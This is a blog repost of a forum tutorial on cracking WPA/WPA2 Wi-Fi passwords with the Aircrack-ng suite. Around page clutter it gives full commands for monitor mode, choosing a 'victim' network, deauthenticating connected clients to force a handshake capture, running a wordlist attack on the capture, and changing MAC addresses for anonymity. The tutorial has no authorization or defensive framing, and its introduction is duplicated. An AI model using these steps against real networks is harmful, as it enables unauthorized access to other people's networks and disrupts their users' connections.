![GTA - SA All [PC] Game Missions Save Files, [Bonus Cheats]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji0bTCRrJKO41LWRud2OPlWVNp3YFMWW6fTKYPF50ctp5sYt5M_qcqbP-ihCtn25AvOb0qr9pH05ktq0577U2U-ZSL8Vn1H3IoEu3pp8-r6zegrO_W1R2SpOiUU4B7HMzx3cBU2Llq7Rc/w680/10h875f.jpg)
The Beginners Guide to Private Investigation
April 05, 2018
![The Ultimate Social Media Image Size Guide for 2018 [Infographic]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uBPTgsgM4eeNcCYpjVDPoMOLSiCNh0IGLEWPM7V_kGHJi9bt1IJ8r3ci28wUteoje5rAFlyGlGCVC8_y0nJ2en8qoV75VSXEGrD7_-UbZXahzSWFFcPzAHvwbw_JZkmEMzM8o1S08m9RC7fcjDmQ3Z=w680)
[TuT]Cracking WPA/WPA2 on Linux
Knowledge
If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is,
some don't agree. The fact is, that if the password is in some sort of dictionary, the password can be cracked.
Just for the record: when it comes to cracking WPA(2), they are cracked the same way ;-).
you'll need a 4-way handshake from a client connecting to an AP.
The 4way handshake holds an encrypted algorithm which can be cracked by dictionary attack.
you'll need a huge list and some luck that the password is in the list,
or you can make a personal list created with a password tool of your choice (like john),
which will not be discussed in this tutorial ;-).For this tutorial, of course I'll be using the Aircrack-ng suite.
If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is,
some don't agree. The fact is, that if the password is in some sort of dictionary, the password can be cracked.
Just for the record: when it comes to cracking WPA(2), they are cracked the same way ;-).
you'll need a 4-way handshake from a client connecting to an AP.
The 4way handshake holds an encrypted algorithm which can be cracked by dictionary attack.
you'll need a huge list and some luck that the password is in the list,
or you can make a personal list created with a password tool of your choice (like john),
which will not be discussed in this tutorial ;-).For this tutorial, of course I'll be using the Aircrack-ng suite.
!Optional: "lazyness"
Code
sudo suyou might need root access to run these applications. For example, if you are using Ubuntu and you
don't want to type "sudo" in front of every line, you could use this optional command.
Knowing what interface to use
first of all, you'll have to know what the name of your wireless interface is, thats why you type:
Code
iwconfig[img]http://webs.hogent.be/quintends/images/iwconfig.png[/img]
In my case, the interface was wlan0, as you can see that's the only one that can connect to anything..
Identifying your victim
Code
airmon-ng start INTERFACEyou'd get a small message saying:
(monitor mode enabled on SPOOFEDINTERFACE ) //In my case, interface was "mon0"..
Code
airodump-ng SPOOFEDINTERFACEThe next step would be choosing your victim. Obviously we would be looking for someone with wpa encryption now.
since you want to crack someone with wpa.
write down his BSSID and his CHANNEL.
[img]http://webs.hogent.be/quintends/images/airodump-ng.jpg[/img]
rebooting the network card to fit in the right Channel
Code
airmon-ng stop SPOOFEDINTERFACE
Code
airmon-ng start INTERFACE CHANNELStart the dumping of the file
Code
airodump-ng -c CHANNEL --bssid BSSID -w psk SPOOFEDINTERFACEThis will start airodump-ng on your specific channel (-c). It will search handshakes
of the specifief bssid and will write this all to a capture file named psk (-w).
Notice! You might ask yourself, but how do I know when I captured a handshake?
-> Well, aircrack thought of that, if you managed to capture a handshake, a message appears in the upper
right corner.
[img]http://webs.hogent.be/quintends/images/handshake.jpg[/img]
!Optional, but very helpful when speeding up the process
So you need to capture a handshake, but the people who are connected of course won't be giving out the
handshake, since this event only takes place during authentication. If we could just boot them for a small second
off their network, so they could reconnect, that would be perfect!
Code
aireplay-ng -0 10 -a BSSID -c CLIENTBSSID SPOOFEDINTERFACEThis would do 10 "deauthentication" attacks (-0) with the AP being BSSID and client being booted CLIENTBSSID.
You can check if a client is connected by looking at your Airodump-ng screen again. If you see on the bottom of that
screen that someone is connected to the ESSID of your victim, simply use the STATION BSSID as CLIENTBSSID in this example.
Code
aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.capThis would crack the actual capture file that was being created by airodump-ng.
notice! You can only try to crack when a handshake actually took place.
Don't forget, -w needs the path to your wordlist, so remember where you saved it!
[img]http://webs.hogent.be/quintends/images/aircrack-ng.jpg[/img]
-> Aircrack-ng while attempting to crack a password
!Optional: "security"
As a scriptkiddy, you might want to remain a bit anonymous, so here's how you would change your mac..
Try to implement it yourself ;-)
Code
sudo ifconfig SPOOFEDINTERFACE down && sudo macchanger -r INTERFACE && sudo macchanger -r SPOOFEDINTERFACE && ifconfig SPOOFEDINTERFACE upWordlists
If you ever needed some good wordlists, I suggest checking here first:
wordlists
Bye
thx for your time guys ;-)
Statscount
Trending Posts
Counter-Strike Global Offensive Guide: Tips For Beginners
September 14, 2017
The Beginners Guide to Private Investigation
April 05, 2018
Cyber harassment helpline goes live in Pakistan
February 08, 2019
Subscribe Us
Total Pageviews
Search
Posts
Categories
Contact Form
Created By eaadhar |
0 Comments